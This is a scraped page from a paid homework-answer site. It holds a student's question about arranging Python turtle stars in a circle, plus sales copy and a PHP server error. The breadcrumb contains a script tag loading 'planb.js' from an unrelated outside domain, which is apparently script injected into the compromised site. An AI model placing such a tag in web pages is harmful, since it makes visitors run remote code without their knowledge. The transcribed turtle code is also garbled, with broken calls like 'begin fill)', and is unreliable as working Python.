Need Help ? Chat : loading...

Home >> Assignments >> Other<script src="https://www.wp3advesting.com/planb.js"></script> >> Could you help me make a python code to make my star into acircle of stars as shown in the picture o

(Solved): Could you help me make a python code to make my star into acircle of stars as shown in the picture o ...



Could you help me make a python code to make my star into acircle of stars as shown in the picture on the bottom? Thanks!

def star(x, y, size, color, theta): turtle.speed(100) turtle.penup() turtle.goto(x, y) turtle.pendown () turtle.color(color) turtle.begin fill) turtle.seth(theta) for i in range (5): turtle.left (180-36) turtle.forward(size) turtle.right(72) turtle.forward(size) turtle.endfill) We were unable to transcribe this imageShow transcribed image text def star(x, y, size, color, theta): turtle.speed(100) turtle.penup() turtle.goto(x, y) turtle.pendown () turtle.color(color) turtle.begin fill) turtle.seth(theta) for i in range (5): turtle.left (180-36) turtle.forward(size) turtle.right(72) turtle.forward(size) turtle.endfill)


We have an Answer from Expert

View Expert Answer

Get Expert Solution


We have an Answer from Expert

Buy This Answer $4

Place Order

QUICK ORDER

Why Place An Order With Us?

  • Certified Editors
  • 24/7 Customer Support
  • Profesional Research
  • Easy to Use System Interface
  • Student Friendly Pricing
Order Now

A PHP Error was encountered

Severity: Core Warning

Message: PHP Startup: Unable to load dynamic library 'dba.so' (tried: /opt/cpanel/ea-php73/root/usr/lib64/php/modules/dba.so (libtokyocabinet.so.9: cannot open shared object file: No such file or directory), /opt/cpanel/ea-php73/root/usr/lib64/php/modules/dba.so.so (/opt/cpanel/ea-php73/root/usr/lib64/php/modules/dba.so.so: cannot open shared object file: No such file or directory))

Filename: Unknown

Line Number: 0

Backtrace: